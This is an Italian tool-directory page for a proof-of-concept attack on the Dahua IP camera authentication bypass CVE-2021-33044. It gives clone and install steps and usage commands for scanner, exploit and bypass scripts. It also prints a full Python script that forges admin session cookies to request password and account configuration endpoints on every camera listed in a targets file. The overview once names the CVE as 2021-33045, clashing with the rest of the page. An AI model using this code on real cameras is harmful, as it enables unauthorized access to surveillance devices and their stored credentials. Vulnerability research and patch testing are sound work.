Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Camera-Dahua-Research-l-h-ng-CVE-2021-33044 — DAHUA_AUTH-BYPASS-CVE-2021-33044 | Kitploit
Strumenti/GitHubGitHub/litndat/camera-dahua-research-l-h-ng-cve-2021-33044
Autenticazione e AutorizzazioneSicurezza IoTAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneRed Teaming

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHub
litndat/camera-dahua-research-l-h-ng-cve-2021-33044

Camera-Dahua-Research-l-h-ng-CVE-2021-33044

DAHUA_AUTH-BYPASS-CVE-2021-33044

Vedi Repository
92 mesi faNon ancora revisionato

Simulazione di exploit per bypass autenticazione Dahua PoC (CVE-2021-33044)

Panoramica

Le telecamere IP Dahua sono dispositivi IoT ampiamente utilizzati nei sistemi di videosorveglianza. Spesso distribuite in reti locali o accessibili da Internet, le vulnerabilità di sicurezza nelle telecamere IP possono compromettere gravemente la privacy e la sicurezza delle informazioni.

CVE-2021-33045 è una vulnerabilità di sicurezza presente in alcune serie di telecamere Dahua, che consente l'accesso non autorizzato a risorse di configurazione interne senza una valida autenticazione. Questa vulnerabilità deriva da un meccanismo di controllo degli accessi debole nel firmware del dispositivo.

Informazioni sulla vulnerabilità

ElementoContenuto
CVECVE-2021-33044
TipoBypass autenticazione
GravitàCritico (CVSS ~9.8)
AutenticazioneNon richiesta
ImpattoTelecamere Dahua / DVR / NVR

Causa

La vulnerabilità deriva da una progettazione non sicura dell'autenticazione nel firmware delle telecamere Dahua:

  • Il server non verifica correttamente session/token
  • Fiducia nei dati inviati dal client
  • Alcuni endpoint di configurazione sensibili controllano solo l'esistenza del cookie, non i permessi di accesso reali

Ciò consente all'attaccante di:

  • falsificare il processo di autenticazione
  • bypassare completamente il login

Riferimenti:

  • NVD CVE-2021-33044
  • http://seclists.org/fulldisclosure/2021/Oct/13

Funzionamento del meccanismo di bypass autenticazione

Flusso normale

root@kitploit:~
→ Il client invia una richiesta HTTP con un cookie arbitrario
→ La telecamera controlla il cookie a livello di interfaccia
→ Nessuna verifica della sessione valida sul backend
→ Consente l'accesso diretto agli endpoint di configurazione interni
→ Restituisce dati sensibili

Scenario

Utilizzo

Installazione

root@kitploit:~
# Clona il repository
git clone https://github.com/eagle-nett/DAHUA_AUTH-BYPASS-CVE-2021-33044.git
cd DAHUA_AUTH-BYPASS-CVE-2021-33044

pip install requests

Scansione di rete

root@kitploit:~
# Scansiona sottorete (porte richieste)
python dahua_scanner.py https://example.com -p 80 8080 8800

# Singolo host con porta
python dahua_scanner.py https://example.com

Porte comuni Dahua: 80,443, 8080, 37777, 37778

Sfruttamento vulnerabilità CVE

root@kitploit:~
python dahua_exploit.py https://example.com -p 8081
python dahua_exploit.py https://example.com -c 2021-33044  #CVE
python dahua_exploit.py --help

Bypass autenticazione

root@kitploit:~
python dahua_auth_bypass.py https://example.com -p 8080
python dahua_auth_bypass.py https://example.com  # Dump del dispositivo dopo il bypass

Esempio

root@kitploit:~
#!/usr/bin/env python3
import requests, sys
requests.packages.urllib3.disable_warnings()

def dump_accounts(ip, port=80):
    base = f"http://{ip}:{port}"
    cookies = {
        "userName": "admin",
        "userLevel": "1",
        "sessionID": "00000000"
    }
    urls = [
        "/current_config/passwd",
        "/current_config/Account1",
        "/current_config/UserMgr",
        "/current_config/accounts"
    ]

    for path in urls:
        try:
            r = requests.get(
                base + path,
                cookies=cookies,
                verify=False,
                timeout=8
            )
            if r.status_code == 200 and len(r.text) > 30:
                print(f"[+] {ip}:{port}  VULNERABLE → {path}")
                return
        except:
            pass

    print(f"[-] {ip}:{port}  safe / patched")

for line in open("targets.txt"):
    t = line.strip()
    if not t or t.startswith("#"):
        continue
    ip = t.split(":")[0]
    port = int(t.split(":")[1]) if ":" in t else 80
    dump_accounts(ip, port)

Spiegazione

  • Lo script utilizza la libreria requests e disattiva attivamente gli avvisi SSL per disabilitare le notifiche SSL.

  • La funzione dump_accounts(ip, port=80) è la funzione principale responsabile del controllo su un singolo dispositivo telecamera. La funzione principale serve a:

    • Costruire l'URL dall'indirizzo IP e dalla porta
    • Simulare lo stato di login amministrativo tramite cookie
    • Inviare richieste agli endpoint di configurazione sensibili
    • Analizzare la risposta per determinare se il dispositivo è vulnerabile o meno
  • Simulazione del cookie di autenticazione. La funzione utilizza valori di cookie come:

    • userName=admin
    • userLevel=1
    • sessionID=00000000
  • Nelle versioni di telecamera vulnerabili, il backend non verifica il sessionID reale, portando il sistema a credere che la richiesta provenga da un account amministratore valido.

Ciclo di elaborazione della lista dei target

Lo script legge una lista di target da un file di input e chiama la funzione di controllo per ciascun dispositivo. Questo approccio consente di valutare più telecamere in modo automatico.

image

Sviluppo

Questi script sono stati sviluppati sulla base di:

  • Dettagli CVE pubblicati da NVD
  • Avvisi di sicurezza Dahua
  • Riferimenti PoC pubblici (seclists.org, packetstormsecurity)

Stato dei test:

  • La logica di bypass autenticazione è implementata secondo le specifiche CVE
  • Test limitati su dispositivi vulnerabili.

Nota

Questo progetto:

  • Solo per scopi didattici e di ricerca
  • Eseguire in ambienti di laboratorio personali
Scarica lo strumento
FileScopoCVE
dahua_scanner.pyScansione di rete — trova telecamere Dahua nella sottoreteRilevamento
dahua_exploit.pyStrumento di scansione Multi-CVE — verifica tutte le vulnerabilitàTutte
dahua_auth_bypass.pyBypass autenticazione dedicato con opzione --dumpCVE-2021-33044